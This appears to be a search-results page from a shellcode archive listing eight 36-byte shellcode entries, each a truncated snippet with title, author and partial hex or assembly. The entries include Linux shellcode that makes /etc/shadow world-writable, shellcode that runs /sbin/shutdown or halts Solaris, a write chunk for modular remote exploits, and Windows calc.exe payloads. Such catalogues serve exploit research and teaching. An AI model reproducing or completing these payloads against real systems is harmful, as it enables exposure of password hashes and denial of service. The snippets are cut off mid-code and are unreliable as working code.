8 matches found
linux/x86 write(0,"Hello core!\n",12); (with optional 7 byte exit) 36 bytes
No description provided by source. / writehello-core.c by Charles Stevenson [email protected] I made this as a chunk you can paste in to make modular remote exploits. I use it to see if my dup2loop worked. If you don't get Hello core!\n back it's a good indicator your shell won't be functional the...
solaris/x86 - Halt shellcode - 36 bytes
Exploit for solaris/x86 platform in category shellcode ======================================= Solaris/x86 - Halt shellcode - 36 bytes ======================================= / Title: Solaris/x86 - Halt shellcode - 36 bytes Auhtor: Jonathan Salwan Web: http://www.shell-storm.org Twitter:...
chmod"/etc/shadow", 0666 shellcode 36 bytes
36 bytes chmod"/etc/shadow", 0666 shellcode. Shellcode exploit for linux platform include include / by Magnefikko 14.04.2010 [email protected] promhyl.oz.pl Subgroup: PRekambr Name: 36 bytes chmod"/etc/shadow", 0666 shellcode Platform: Linux x86 chmod"/etc/shadow", 0666; gcc -Wl,-z,execstack...
Windows Server 2003 Enterprise Edition SP1 ita calc.exe shellcode 36 bytes
Windows XP Professional SP2 calc.exe 36字节溢出漏洞同时存在于Windows Server 2003 Enterprise Edition SP1 中。 Windows Server 2003 Enterprise Edition SP1 请关注微软最新公告 include stdio.h include string.h char liscker = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x0d\x25\x86\x7c\xff\xd3\x31\xc0"...
Windows XP Professional SP2 ita calc.exe shellcode 36 bytes
No description provided by source. / Title: Windows XP Professional SP2 ita calc.exe shellcode 36 bytes Type: Shellcode Author: Stoke Platform: win32 Tested on: Windows XP Professional SP2 ita / include stdio.h include string.h int main char shell = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb"...
win32/xp sp3 (Ita) calc.exe shellcode 36 bytes
Exploit for win32 platform in category shellcode ============================================== win32/xp sp3 Ita calc.exe shellcode 36 bytes ============================================== / Title: Windows XP Professional SP2 ita calc.exe shellcode 36 bytes Type: Shellcode Author: Stoke Platform:...
Windows XP Professional SP2 ita calc.exe shellcode 36 bytes
Windows XP Professional SP2 ita calc.exe shellcode 36 bytes. Shellcode exploit for win32 platform / Title: Windows XP Professional SP2 ita calc.exe shellcode 36 bytes Type: Shellcode Author: Stoke Platform: win32 Tested on: Windows XP Professional SP2 ita / include include int main char shell =...
Linux/x86 - execve(/sbin/shutdown,/sbin/shutdown 0) Shellcode (36 bytes)
Linux/x86 - execve/sbin/shutdown,/sbin/shutdown 0 Shellcode 36 bytes. Shellcode exploit for Linuxx86 platform include const char shellcode= "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x64\x6f\x77\x6e" // push $0x6e776f64 "\x68\x73\x68\x75\x74" // push...